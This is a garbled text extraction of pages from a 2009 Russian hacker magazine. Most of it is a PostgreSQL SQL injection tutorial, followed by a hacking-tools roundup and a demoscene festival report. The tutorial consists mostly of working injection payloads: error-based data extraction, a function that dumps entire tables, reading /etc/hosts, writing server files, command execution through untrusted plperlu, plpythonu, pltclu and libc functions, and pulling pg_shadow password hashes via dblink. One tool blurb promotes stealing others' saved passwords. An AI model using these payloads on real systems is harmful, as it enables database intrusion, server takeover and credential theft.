Добавил:

Anonymhacker Опубликованный материал нарушает ваши авторские права? Сообщите нам.

Вуз:

Пензенский Государственный Университет

Предмет:

[НЕСОРТИРОВАННОЕ]

Файл:

130_Optimized

.pdf

Скачиваний:

Добавлен:

20.04.2024

Размер:

17.96 Mб

Скачать

☆

<<< < Предыдущая 1 2 3 4 5 6 7 89 / 159 10 11 12 13 14 15 > Следующая >>>

hang

NOW!

BUY

w Click

-xcha

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w		Click		to						m
w		Click								m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

id=10;SELECT CAST(usesuper AS text) FROM pg_user

неприводилкошибкеивозвращалвполне определенноезначение.

Сдругойстороны, являетсялиэтобольшимминусом? Скореевсего, нет. Таккакбольшинство потенциальноинтересныхполейимеюттип name,text,char, которыйблагополучноприводитсякдругимтипамивызываетнужнуюнам ошибку. Плюсыжеспособаочевидны. Мыне используемunion, намненужноподбиратьколичествоколонок, атакжеискатьправильный еетип. Способбудетработатьслюбойслепой инъекцией.

Сложнуюконструкциюфункцийcast() можно заменитьнаболеепростую, спомощьюдвух двоеточий'::'. Следующийзапросвернет намназваниебазыданныхиимятаблицы:

id=10;SELECT (table_ schema||':::'||table_ name)::text::boolean FROM information_schema.tables

МНОГОСТРОЧНЫЕЗАПРОСЫ

ИногдаSQL-запросможетсостоятьизнесколь- кихстрок. Пример:

SELECT id,title,text

FROM news

WHERE id=$id

AND is_enable=TRUE

PHPPGADMIN. АНАЛОГPMA ДЛЯPOSTGRESQL

Если мы не знаем имя таблицы, из которой извлекаются данные, можно составить универсальный запрос для любого случая:

Id=10;SELECT version()::int;SELECT 1 FROM pg_user WHERE 1=1 or 2=2

ВСЕПРЕЛЕСТИUSESUPER

Атеперьрассмотримслучай, когдазапрос

SELECT usesuper FROM pg_user WHERE

LIMIT? NO LIMIT

Зачемиспользоватьlimit илиnot in (), когда мыможемвывестисразувсезаписи. Дляэтого намнужно, чтобыбылвключенязыкplpgsql, либо, еслиимеемправаusesuper, создадимего самостоятельно:

id=10;CREATE LANGUAGE 'plpgsql'

Авотисамафункция:

Вэтомслучаеиспользованиесимволов«--»

намнепоможет, таккакзакомментируется толькотекущаястрока. Чтобыреализовать SQL-Injection, нужносоставитьсинтаксически правильныйзапрос. Вданномслучаеонбудет выглядетьтак:

Id=10;SELECT version()::int;SELECT id FROM news WHERE 1=1

usename=current_user

возвращаетзначениеtrue. Здесьунаснеобъятноеполедлядействий, начинаясвывода всейинформацииизтаблицыизаканчивая выполнениемсистемныхкоманднасервере. Сейчастыпоймешь, чтоPostgreSQL нетолько мощная, ноивнеумелыхрукахоченьопасная штука.

PGSQL-BUGS — ИНОГДАЗДЕСЬПОЯВЛЯЕТСЯИНТЕРЕСНАЯ ИНФОРМАЦИЯ

id=10;CREATE OR

REPLACE FUNCTION getall (text,text,text,text,text,text) RETURNS text AS $func$

DECLARE
schema	ALIAS FOR $1;
table	ALIAS FOR $2;
column1	ALIAS FOR $3;
column2	ALIAS FOR $4;
column3	ALIAS FOR $5;
column4	ALIAS FOR $6;
count	int;
i	int;
temp	text;
int_test	text;
input_refc	refcursor;

BEGIN

int_test := '';

OPEN input_refc FOR EXECUTE $qr$SELECT count($qr$ || quote_ ident(column1) || $qr$) from $qr$ || quote_ident(schema) || $qr$.$qr$ || quote_ident(table);

FETCH input_refc into count; CLOSE input_refc;

count := count — 1; BEGIN

FOR i in 0..count LOOP OPEN input_refc FOR

XÀÊÅÐ 10 /130/ 09

079

hang

NOW!

BUY

ВЗЛОМ

w Click

xcha

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

ОПИСАНИЕUDF-ЭКСПЛОИТАДЛЯ

POSTGRESQL...

EXECUTE $qr$SELECT $qr$

||quote_ident(column1)

||$qr$||chr(58)||$qr$ || quote_ident(column2) || $qr$||chr(58)||$qr$ || quote_ident(column3) || $qr$||chr(58)||$qr$ || quote_ident(column4) || $qr$||$sep$<BR>$sep$ FROM $qr$ || quote_ident(schema) || $qr$.$qr$

||quote_ident(table) || $qr$ LIMIT 1 OFFSET $qr$ || i;

FETCH input_refc into temp; CLOSE input_refc;

int_test := int_test || temp; END LOOP;

RETURN int_test; END;

END;

$func$ LANGUAGE plpgsql;

Функция получает 6 параметров, имя БД, название таблицы и 4 колонки. Пример использования:

id=10;SELECT getall('pg_ catalog','pg_user','usename',’use

sysid’,’usesuper’,’passwd’)::int

А вот и результат:

hacker:16384:false:********

nobody:16385:true:********

park:16386:true:********

postgres:10:true:********

reader:16387:false:********

sa:16388:true:********

ЧИТАЕМФАЙЛЫ

Чтобы прочитать файл, нам нужно выполнить несколько действий. Для начала создадим таблицу с одним полем типа text:

id=10;CREATE TABLE filetbl(file text)

После этого занесем содержимое файла /etc/ hosts в таблицу:

id=10;COPY filetbl FROM '/etc/hosts'

...ИЕГОРЕАЛИЗАЦИЯ:)

— и прочитаем его уже известным нам способом.

id=10;SELECT file::boolean FROM filetbl

Каждая новая строка файла записывается в новое поле таблицы. Предыдущий запрос выведет лишь первую строку. Для вывода всего файла построчно используй либо where file not in(), либо, если ты используешь конструкцию UNION — limit 1 offset n.

СОЗДАЕМФАЙЛЫ

Имея права суперюзера, мы можем создать произвольный файл на сервере. Для этого выполняем запрос:

id=10;COPY (SELECT 'I like it') TO '/tmp/pgtest.txt'

И видим результат:

-rw-r--r-- 1 postgres postgres 10 Aug 31 19:14 pgtest.txt

К счастью для нас, PostgreSQL создает файл с правами чтения для всех, что позволяет, при наличии локального инклуда, записать код в файл и выполнить его. Помимо этого, существуют стандартные функции администрирования сервера:

pg_read_file — Чтение файла pg_ls_dir — Листинг директории

Однако реальной пользы от этих функций мало, так как они работают только в директории, указанной в $PGDATA, и выйти из нее не получится.

Query failed: ERROR: absolute path not allowed

Query failed: ERROR: reference to parent directory ("..") not allowed

ВЫПОЛНЕНИЕ ПРОИЗВОЛЬНОГОКОДА

PostgreSQL является очень мощной базой данных с поддержкой многих процедурных языков. В стандартный дистрибутив сейчас входят следующие:

C — он же pure c, знакомый нам язык plperl — процедурный язык Perl plpython — Python

pltcl — TCL

Помимо стандартных языков, имеются сторонние реализации, такие как plPHP, plRuby и plJava. Имея права usesuper, мы можем создать функцию на любом из этих языков.

Прежде, чем начать, вернемся к таблице pg_language. Для этого выполним запрос:

id=10;SELECT (lanname,lanispl,lan pltrusted)::text::boolean FROM pg_ language WHERE lanname='plperl'

Здесьмынеиспользуемобъединениестрокс помощьюпайпов, апростовводимименаколонокчереззапятую, врезультатевидимошибку:

Query failed: ERROR: invalid input syntax for type boolean: "(plperl,t,t)"

Теперь мы знаем, что язык plperl является процедурным, а также безопасным. Что же

внем безопасного, спросишь ты. А я тебе покажу на примере. Попробуем создать простенькую функцию, которая будет принимать один параметр типа text и выводить символы

вобратном порядке. Такой запрос будет иметь вид:

080	XÀÊÅÐ 10 /130/ 09

hang

NOW!

BUY

w Click

-xcha

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w		Click		to						m
w		Click								m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

КЛАССИКАUNION. УЗНАЕМИМЯ ЮЗЕРАИВЕРСИЮ

id=10;CREATE OR REPLACE FUNCTION ret (text) RETURNS text AS 'return revers($_)' LANGUAGE 'plperl'

Теперь опробуем ее на деле:

id=10;SELECT ret('hello')::boolean

В ошибке видим:

Query failed: ERROR: invalid input syntax for type boolean: "olleh"

Следовательно, всеработает, какнадо. Но намэтогомало, нужнополучитьвыполнение системныхкоманд. Вотименноздесьииграет своюрольlanpltrusted. Попыткисоздать функциюсиспользованиемsystem(), print `` иopen() спайпамивозвращаютсоответствую-

щиеошибки:

Query failed: ERROR: creation of Perl function "ret" failed:

'system' trapped by operation mask Query failed: ERROR: creation

of Perl function "ret" failed: 'quoted execution (``, qx)'

trapped by operation mask

Query failed: ERROR: creation of Perl function "ret" failed: 'open' trapped by operation mask

Постгрес не дает нам создать потенциально опасные функции, но и это можно обойти. Для начала создадим новый язык по шаблону языка Perl. Список шаблонов находится в таблице pg_pltemplate. Чтобы создать новый язык, пишем:

id=10;CREATE LANGUAGE 'plperlu'

В таблице pg_language появится новый язык plperlu, но поле lanpltrusted уже будет false,

символ «u» как раз и означает «недоверенный» (Untrusted). Теперь нам остается создать функцию, которая будет выполнять системную команду на сервере и выводить ее результат:

XÀÊÅÐ 10 /130/ 09

ОПРЕДЕЛЯЕМВЕРСИЮ, ПРЕОБРАЗУЯТИПВINTEGER

id=10;CREATE OR REPLACE FUNCTION sys (text) RETURNS text AS 'open(FL, "$_ |");print

join("",<FL>)' LANGUAGE 'plperlu'

Выполняем:

id=10;SELECT sys('id')::boolean

В ответ получаем:

Query failed: ERROR: invalid input syntax for type boolean:

"uid=26(postgres) gid=26(postgres) groups=26(postgres)

Адальше— ктоначтогоразд. Можнопоискать папкиназапись, илизалитьнасервербекконект, — тогдаунасбудутправаpostgres. Также приведупримерысистемныхфункцийнадругих языках:

Python:

id=10;CREATE OR REPLACE FUNCTION sys (text) RETURNS text AS 'import os; return os.popen(args[0]). read()' LANGUAGE 'plpythonu'

TCL

id=10;CREATE OR REPLACE FUNCTION sys (text) RETURNS text AS 'exec $1' LANGUAGE 'pltclu'

id=10;CREATE OR REPLACE FUNCTION sys (cstring) RETURNS text AS '/ lib/libc.so.6', 'system' LANGUAGE 'C' STRICT

DBLINK() ИTRUST

АУТЕНТИФИКАЦИЯ

В завершение статьи хочу рассказать тебе о редко встречающейся, но край-

не полезной функции под названием dblink(). Создана она была для подключения к другой базе данных непосредственно в самом SQL-запросе. Ее использование выглядит так:

SELECT * FROM dblink('host=127.0.0.1

user=someuser

password=somepass

dbname=somedb',

'SELECT column FROM sometable') RETURNS (result TEXT);

А теперь я расскажу, что же такое локальная трастовая аутентификация. По умолчанию PostgreSQL позволяет локально подключаться любому пользователю даже без пароля. Что это нам дает? При наличии dblink() мы можем выполнять запросы непосредственно от имени супер пользователя. Вот пример подобного запроса:

id=10;SELECT * FROM dblink('host=127.0.0.1

user=postgres db=somedb','SELECT passwd from pg_shadow') RETURNS (result text)

Ну а что делать, когда имеешь права суперюзера, ты уже знаешь.

OUTRO

Я попытался раскрыть наиболее важные аспекты проведения инъекций в PostgreSQL, затронув их ключевые особенности. Всю документацию ты можешь получить на официальном

сайте postgresql.org, либо... пиши мне на e-mail :) z

081

hang

NOW!

BUY

ВЗЛОМ

BUY

w Click

ЛЕОНИД «R0ID» СТРОЙКОВ R0ID@BK.RU

X-TOOLS

-xcha

-x cha

ПРОГРАММЫДЛЯХАКЕРОВ

ПРОГРАММА: FTP INDEXER CLASS ОС: *NIX/WIN

АВТОР: SHARKY

Будьточекингфтп-акковилимассовыйифрей- минг— вездетребуетсясофт, причем, разнопла-

Сорецфтп-класса:)

новогохарактера, которыйобъединяетлишьодно

— работасфтп-протоколом. Зачастуюутилыпод своинуждыприходитсякодитьсобственноручно, изобретаяприэтомвелосипед:). Чтож, болеенапрягатьсянепридется, ктвоимуслугамудобный

PHP-классотSharky — «FTP Indexer Class». Как видноизназвания— класспредназначендля индексациифайловиупрощенияпоиска. Приводитьсореццеликомврубрике— делонеблагодарное, посемурассмотримосновныемоменты: 1. Коннектиавторизация:

$ftpic = new FtpIC([сервер], [порт], [таймаут], [логин], [пароль], [Отображение ошибок]);

Например:

$ftpic = new FtpIC("blablabla.com", 21, 10, "admin", "12345", true);

Вслучаеудачнойавторизации— TRUE, впротивномслучае— FALSE.

2. Структурафайловипапок:

$ftpic->tree([корневая папка], [глубина построения]);

Например:

$ftpic->tree("/www/", 2);

Примервыполнения:

[stats] => Array (

082

[file] => Array (

[0]=> blablabla.com.txt

[1]=> blablabla2.com.txt

[2]=> blablabla3.com.txt

)

3. Поискфайлов:

$ftpic->find([объект поиска], [корневая папка]);

Например:

$ftpic->find("phpmyadmin", "/");

Ответ:

Array (

[0]=> /blablabla.com/phpmyadmin/

[1]=> /blablabla2.com/phpmyadmin/

[2]=> /bck/phpmyadmin.txt

)

Словом, описыватькласспочтибесполезно. Лучшеодинразувидетьизаюзать:).

P.S. Вносяизменениявсорец— незабывайо копирайтахавтора.

ПРОГРАММА: CFM

ОС: *NIX

АВТОР: АЛЕКСЕЙРЕМНЕВ

Обрастаясовременеммножествомсерверов, используемыхподразныезадачи, мынеизбежносталкиваемсясоднойсущественной проблемой— необходимостьюследитьза каждымдедикомвотдельности. Однакоспоявлениемтакойутилы, какCFM aka Complex For Monitoring, порядоквещейменяетсявкорне. Тулзапредставляетсобойсистемумониторинга сетевойинфраструктурыи, чтонеможетне радовать, являетсяполноценнымOpenSourceпродуктом. Софтинаосуществляетсборданных спомощьюsnmp-протоколаисовместимас любымЛинух-дистром. Стоитотметить, чтоклиентскаячастьсистемыреализованавкачестве плагинадляфайрфокса, асерверная— написананаперлеисостоитизтрехосновныхчастей:

•Подсистема опроса устройств — определяет доступность различных девайсов в системе

•Подсистема оповещения о возникновении критических событий — рассылает уведомления на мыло при возникновении критических событий

•Подсистема получения трапов —

КонфигурируемCFM

предназначена для получения и визуального представления содержимого

трапов, полученных от устройств

Перединсталляциейтулзыследуетпроверить наличиевсехнеобходимыхдляработыкомпонентов, аименно:

•mysql

•apache

•postfix (или любая другая почтовая система)

•mailx

•Perl-модули:

DBI, Net-SNMP, Net-DNS, net-ping, MailTools, MIME-Lite, MIME-Base64, XML-XPath, XML-Parser

Крометого, необходимоподружитьапачи мускулсUTF-8, — послечегоможнопереходить кустановке(предварительнозалогинившись подрутом):

./cfm_install.pl -p <mysql_root_ password>

Впроцессеинсталлабудутсозданыследующие БД:

•cfm_cfg — база для конфигурации и текущего состояния опрашиваемых устройств

•cfm_mon — база для хранения значе- ний опроса устройств

•cfm_traps — база для хранения полученных трапов

Вбазеcfm_cfg находятсятаблицы:

•DEVCFG — конфигурация опрашиваемых устройств

•SNMPCFG — значения опрашиваемых OID

•SNMPVAL — текущие значения опроса

•DEVSTS — текущий статус и счетчик ошибок каждого девайса

•ALARMCFG — конфиг системы опове-

XÀÊÅÐ 10 /130/ 09

				hang		e
			C			e	E
		X					E
	-							d
	F									i
	F									t
P	D									o
P	D					NOW!				r
					BUY	NOW!
				to	BUY
				to
w											m
w Click										o	m
	w									o
	.								.c
		p	df					e
		p					g
						n
				-xcha

щения

•GRAPHCFG — конфигурация графиков для каждого девайса

•USERS — список отв. лиц для службы оповещения

•CROSSID — используется для получе- ния списка отв. лиц

•OFFICE — список помещений, в которых установлено контролируемое оборудование

•TEMPRCFG — конфигурация мониторинга температуры в помещениях

•CROUPS — используется для получе- ния списка групп оборудования

•MIBFILE — используется для учета установленных файлов MIB

•mib2

•entrtprises

•clns

•snmpDomains

•snmpProxys

•snmpModules

Такжепоявятсядвановыхмускул-юзера:

•cfmroot — админский аккаунт, используется демонами, пасс по дефолту: t25r8sts

•cfmuser — нободи акк, используется перл-скриптами, пасс по дефолту: cfm

Послезавершенияустановкинастоятельнорекомендуетсясменитьпароли, внесясоответствующиеизменениявCFM. Запусксистемы мониторингаосуществляетсякомандой/etc/ init.d/cfm start.

Клиентскаячастьввидефф-плагинасостоитиз двухчастей: cfmadmin.xpi иcfmuser.xpi. После установкиизапускабраузерабудутдоступны основныеразделыменю:

•CFM admin — запуск админки

•CFM view — запуск юзерской панели

Скаждымизразделовразумнеезнакомиться опытнымпутем, ибоописатьихполностью— не представляетсявозможнымпопричинеширокойфункциональности. Уверен, чтовпроцессе эксплуатациитыподостоинствуоценишьвсе преимуществасегопродукта, который, несомненно, облегчиттебежизнь.

P.S. Благодаримавторасофтинызапрекрасныйрелизисливаемутилуснашегодиска. Еслиутебяпрямыерукииработоспособная голова— смелопомогайразвиватьпроектна http://fireforge.net/projects/cfm.

ПРОГРАММА:

MULTI PASSWORD RECOVERY

ОС: WINDIWS95/98/ME/2000/2003/

XP/VISTA

АВТОР: АЛЕКСАНДРДЕМЧЕНКО

Порой очень хочется вспомнить все свои забытые пароли, включая аську, мыло, фтп, а также пассы, сохраненные в браузере, даже если они не совсем твои :). Желание вполне естественное, а главное — легко осуществимое. Благо, утила Multi Password

XÀÊÅÐ 10 /130/ 09

Вспоминаемпароли:)

Recovery уверенно продолжает развиваться и радовать нас новыми функциями. На этот раз я предлагаю обратить внимание на portable-версию тулзы, которую ты без труда сможешь закинуть на флешку и взять с собой в гости к другу... Из особенностей софтины следует выделить:

•Дешифрование пассов налету

•Чтение паролей под звездочками

•Аудит сохраненных паролей (aka проверка на стойкость)

•Поддержка множества дополнительных плагинов

•Копирование SAM-файла

•Обработка заблокированных для чтения файлов

•Сохранение найденных паролей в файл

•Генератор паролей

Особенновпечатляетсписокподдерживаемогодляизвлеченияпаролейсофта, среди которого…

1.FTP-клиенты:

•Windows/Total Commander 4.x, 6.x

•FAR Manager 1.6x, 1.7x

•WS_FTP 5, 6, 7, 8, 9, 10 Home/Pro, 2007

•CuteFTP Home/Pro (mostly all versions)

•FlashFXP 1.x-3.x

•FileZilla 2.x

•FTP Commander Pro/Deluxe (mostly all versions)

•FTP Navigator (mostly all versions)

•BulletProof FTP Client 1.x, 2.x

•SmartFTP 1.x, 2.x

•TurboFTP 5

•FFFTP 1.x

•CoffeeCup FTP 3.x

•Core FTP 2.x

•FTPExplorer 7.x

•Frigate3 FTP 3.x

•UltraFXP 1.x

•FTPRush 1.x

•SecureFX (mostly all versions)

•Web Site Publisher 2.1.0

•BitKinex 3.0.8

•ExpanDrive 1.8

•Classic FTP PC (mostly all versions)

•Fling (mostly all versions)

•SoftX FTP Client (mostly all versions)

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

•Directory Opus (mostly all versions)

•FTP Uploader (mostly all versions)

2. E-mail-клиенты:

•Outlook Express 6.0

•Outlook 2000 (MSO 2000), 2002 (MSO XP), 2003 (MSO .NET), 2007

•Mozilla Thunderbird 1.0

•The Bat! v. 1.x, 2.x, 3.x

•Becky 2.x

•Eudora/Eudora Light (mostly all versions)

•Gmail Notifier (mostly all versions)

•Mail.Ru Agent 4.x

•Opera Email Client

•IncrediMail (mostly all versions)

•Group Mail Free (mostly all versions)

•Vypress Auvis 2.x

•PocoMail 3.x, 4.x

•Forte Agent 3.x

•iScribe/nScribe 1.x

•POP Peeper 3.x

•Mail Commander 8.x

•Windows Mail (mostly all versions)

•Windows Live Mail (mostly all versions)

Крометого, тулзауспешновспоминаетпассыот рядаIM-клиентовиещемножестваполезных утил.

ПРОГРАММА: AUTOCLICKEXTREME ОС: WINDIWS 2000/XP

АВТОР: SHER-KHAN-SOFT

Каждый день мы сталкиваемся с рутиной, причем нередко приходится повторять одни и те же действия, напоминающие подобие копипаста :). Для решения проблемы и были придуманы автокликеры, способные повторять нажатия клавиш мыши и клавы. Несколько подобных прог я уже описывал в Х-Тулз, и сегодня хочу познакомить тебя с достойным представителем софтин подобного рода. Встречай — AutoClickExtreme. Из основных возможностей утилы можно отметить:

•Запись/воспроизведение действий юзера в произвольных приложениях

•Пиксельный контроль, то есть возможность привязки действий мыши к пиксельным изображениям на экране

•Удобная настройка случайного отклонения кликов мышкой

•Возможность вставки из буфера обмена произвольного текста вместо короткой команды вызова

•Управление буфером обмена

•Назначение «горячих» клавиш для каждой записи

•Управление записями

Поверь, утилавполнефункциональна. Ты убедишьсявэтом, кактолькоопробуешьее собственноручно. z

083

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

СЦЕНА

МАРИЯ «MIFRILL» НЕФЕДОВА MIFRILL@REAL.XAKEP.RU

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

ОТОМ,КАКПРОШЕЛЗНАМЕНИТЫЙФЕСТВЭТОМГОДУ

ФЕСТИВАЛЬCHAOSCONSTRUCTIONS(CC)—ОДНАИЗСТАРЕЙШИХ ДЕМО-ПАТИВРОССИИ,ХОТЯНАСЕГОДНЯШНИЙДЕНЬCCПОФОРМАТУ СТАЛБЛИЖЕКLAN-ПАТИ,ИЛИПРОСТОККОМПЬЮТЕРНОМУ ФЕСТИВАЛЮ.КАКБЫТОНИБЫЛО,ГОДОТГОДАНАCHAOS CONSTRUCTIONSПРИЕЗЖАЮТУМЕЛЬЦЫИЗСАМЫХОТДАЛЕННЫХ УГОЛКОВНАШЕЙСТРАНЫ,АТАКЖЕСОСЕДИИЗСТРАНБЛИЖНЕГО ИНЕОЧЕНЬЗАРУБЕЖЬЯ.СЕЙЧАСЯРАССКАЖУТЕБЕОТОМ,КАК РАЗВЛЕКАЕТСЯНАШАНДЕГРАУНД,ИНАЧТОСПОСОБНЫТЕСАМЫЕ «УМЕЛЬЦЫ».

084	XÀÊÅÐ 10 /130/ 09

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

ИНТРО	виальныхкодерскихметодикиалгоритмов).	сконкурсамидляказуалов(чтобыонинечувст-
Передтемкакнепосредственноперейтикрас-	Состоялипервыеинтроидемо, какправило,	вовалисебясовсемужобделенными). Пожа-
сказуоChaos Constructions 09, хочетсянемного	простоизникаавтораилиегологотипа, плюс	луй, единственное, чтосгодаминепретерпело
рассказатьоявлениидемосценыкактаковом,	самыечумовыекрасотыиэффекты, накоторые	никакихизменений— CC какиранееостается
ведьдажеорганизаторыЦЦневозражают	толькобылспособенкомпьютертехлет. В	мероприятиемнекоммерческиминеформаль-
против«экскурсоввисторию».	скоромвремени, когданекая«критическая	ным, строящимсянавольныхначинанияхи,
Итак, длятех, ктопоследниегодыпрожилв	масса» мейкеровбыладостигнута, ониначали	посути, наголомэнтузиазмеорганизаторов.
глубокомбункеревтайге— какоченьверно	банальносоревноватьсядругсдругом(порой	Длятех, кто«хочетзнатьгероеввлицо» — три
замечаетрусскаяВикипедия— «демосцена—	даженегласно), стараясьперещеголять«кон-	главныхоргаЦЦ2009 — Oldayn, Frog иRandom;
этосубкультураинаправлениекомпьютерного	курентов» ипридуматьчто-тоновое, ещеникем	именноэтихлюдейстоитблагодаритьзато, что
искусства», иключевоесловоздесьименно	нереализованное. Воттебеидемосцена, ачуть	фестивальвообщеимелместо. Всегоженад
«искусство». Зародилсяэтоторигинальный	позжеидемо-патисфестивалями.	организациейфестивалявэтомгодутрудилось
способтворческогосамовыраженияпримерно	Итак, надеюсь, тыещенеумираешьотскуки,	порядка20 человек.
одновременноспоявлениемпервыхдомаш-	потомучтотеперьяпозволюсебеещенемного	В ОБЩЕМ И ЦЕЛОМ
нихкомпов— в70-80-егоды. Именнотогда	позанудствоватьисказатьпарувводныхслово	В ОБЩЕМ И ЦЕЛОМ
компьютерынетолькостали«ближеклюдям»,	самомфесте.	ВотужекоторыйгодChaos Constructions
ноинаучилисьвоспроизводитьграфикуизвук.	Chaos Constructions тусовкастарая— зародил-	проходитвконцелетавПитере, натерритории
Атамгдеестьмузыкаивизуальныйряд, всегда	сяфествдалеком1995, подименемEnLight,	торгово-выставочногокомплекса«Евразия».
найдетсяместоиполетуфантазии.	итогдаэтабылаклассическаядемо-пати. Не	Сюдаприезжаюттысячичеловекизсамых
НабазетакихкультовыхмашинкакZX Spec-	сложнодогадаться, чтомероприятиепоначалу	разныхстранмира, будьтоКазахстан, Украина,
trum, Commodore 64, апозжеAmiga иAtari,	быловесьмакамерным, ведьвтегодывРоссии	БелоруссияилиСША, нуи, конечно, здесь
первыедемомейкерыначали«творитьчудеса»	одемосценезнали, пожалуй, толькосами	полнонародуизвсехуголковнашейогромной
— онизаставляликомпыисполнятьтрюки,	демомейкеры, дакругприближенныхкним	страны. Особенностоитотметитьтотфакт, что
которыепотемвременамбылидикостью.	лицифанов. ТакчтобудущийЦЦсобираллишь	впоследниегодыгостиимеютвозможность
Первымиласточкаминовогоискусствастали	парусотенчеловекиполностьюпосвящался	остатьсяночеватьпрямонафестивале(для
короткиеинтро— заставки, которыеприсо-	демо-искусству.	этогопредусматриваютсяиместаиусловия),
вокупляликвзломаннымиграм, софтуилик	Носгодамиситуациясталаменяться— ввек	такчтоимможнонезабиватьсебеголовупоис-
совсемещесовсемредкимвтупоруезинам.	развитыхвидеокартиигрдемо-сценаначала	камигостиницыилишнимирасходами.
Да-да, ломатьигрыисофтиписатькнимкряки,	сдаватьпозиции— ксожалению, малокому	НоCC уникаленнетолькотем, чтоемусум-
началипрактическиодновременноспоявле-	сегодняинтересновтискиватькрасивостив	марноужеболее10 летитем, чтоаналогичных
ниемнасветКИисофта.	микрокод, когдакакая-нибудьNVidia ипять	мероприятийвРоссиипрактическинет, нои
Чемменьше«весила» демомейкерскаяподел-	гиговтекстурпереварит, неподавится. Витоге,	совершеннонеповторимойатмосферой. На
ка, темлучше, но, несмотряна«вес», крохотная	Chaos Constructions потихонькумутировалв	самомделе, яврядлипогрешупротивправды,
прогавыжималаизкомпьютеравсе, начто	полноценныйкомпьютерныйфест, свыставкой	еслискажу, чтоChaos Constructions «делают»
тотбылспособен(путемреализациинетри-	старогожелеза, хак-зоной, семинарамиидаже	именноприезжающиесюдалюдииатмосфера,

XÀÊÅÐ 10 /130/ 09

085

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

СЦЕНА

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

авовсенеконкурсы, семинарыи	наоборотностальгировалпоста-	лялосьпогоннымисотнями, или	емакселерациинаплатеNeoGS,
ижесними. Посути, развгод, в	рымкомпамибылымвременам. В	дажедесятками, ноэтообычное	ивыдаеттакиеэффекты, которых
концеавгуста, почтивесьрусский	этомжегодулюдичинновыстрои-	дело— народбралкачеством, а	отобычногоСпектрумаждатьне
компьютерныйандеграундвыби-	лисьваккуратнуюочередьнавход,	неколичеством. Нидлякого, в	приходится. Интереснатакжеи
раетсяизсвоихберлогисовсего	держаподмышкаминоутбуки, и	общем-то, несекрет, чтонашиде-	работа, занявшая4-еместо— «8
мирасъезжаетсявПитер, анаэто,	особойжаждыобщениязаними	момейкерыпишуттакиешедевры,	bit snail» отsvo. Простенькое, на
поверь, стоитпосмотреть.	замеченонебыло. Очевидно, это	откоторыхзавистливоподвывает	первыйвзгляд, интронаписано
НаЦЦкаждыйможетнайтичто-то	связаностем, чтосерьезныхдядек	икусаетлоктивсязападнаясцена.	длявесьмаредкойплатформы
свое: кого-тобольшезаинтересуют	наCC сталоприезжатьменьше,	Такчто, хотьCC инедотягиваетдо	Вектор06ц, чтосамопосебе
конкурсы(ихздесьпредстав-	ановыелюди(которых, ксчас-	размахатойжеAssembly, интерес-	достойновсякогоуваженияи,
леноченьширокийспектр, от	тью, быломного), ещенеуспели	ногоздесьбываетнемало.	возможно, дажеболеевысокого
паяльныхипрограммерских, до	распробоватьзапретныйплодпо	Вобщихчертахможносказать,	места:).
демосценерскихипростокреа-	имениChaos Constructions :).	чтобольшевсегоработнаCC09	ВCombined 64k Intro победила
тивных, например, налучшеефото	ДЕМОСЦЕНА	вполнетрадиционнопредставили	мрачноватаяистильная«Write
илирисунок, сделанныенафес-	ДЕМОСЦЕНА	спектрумисты, коихунасдосих	me, please» отf0x.
тивале), кого-то— компьютерная	БольшаячастьвремениCC, тради-	порнемало, ионилюбятпоказать	ПервоеместовCombined Demo
безопасность, акого-то— общение	ционно, посвящаетсявсевозмож-	класс. Теперьнемногоподроб-	(объемомдо16 Мб) досталось
слюдьми, посиделкизастарыми	нымконкурсам— вэтомгодуна	ностейосамыхпримечательных	«Digere animo» отdemarche, но
компьютерамииностальгические	фестивалесостоялосьбезмалого	работах, ораспределениимести	самконкурсвыгляделбледнова-
воспоминания. Всеперечислен-	30 различныхсостязаний. Частьиз	победителях.	то— имеявсвоемраспоряжении

ное, помноженноенанефор-	нихпроходитврежимереального	Интро«Yes we can» отQuite,	болееширокоеполедеятельности,
мальнуюобстановку, порождает	времени, другаяжечастьтребует	взявшеепервоеместовконкурсе	авторыпоказалипочтитожеса-
непередаваемыйкоктейль.	длительнойподготовки, такчто	Combined 4k Intro — яркийпример	мое, чтоиихколлегиизконкурсов
Вэтомгодумасштабностьфес-	приемработначинаетсязане-	того, почемунашейсценезавидует	сжесткимиограничениямипо
тиваляосталасьпримернона	сколькомесяцев.	весьзапад. Визуалв«Yes we can»	«весу» работ.
томжеуровне, чтоив2007-2008	Последнее, какнетруднодога-	создаетсяполностьюзасчет	А вот с JavaFX demo и вовсе вы-
годах. Количествопосетителей,	даться, относитсявосновном	шейдеров, ииспользоватьтакой	шел небольшой казус — первое
количествоконкурсов, атакжеих	кдемосцене— разнообразные	прием, когданикакихобъектоввне	место пришлось отдать сереб-
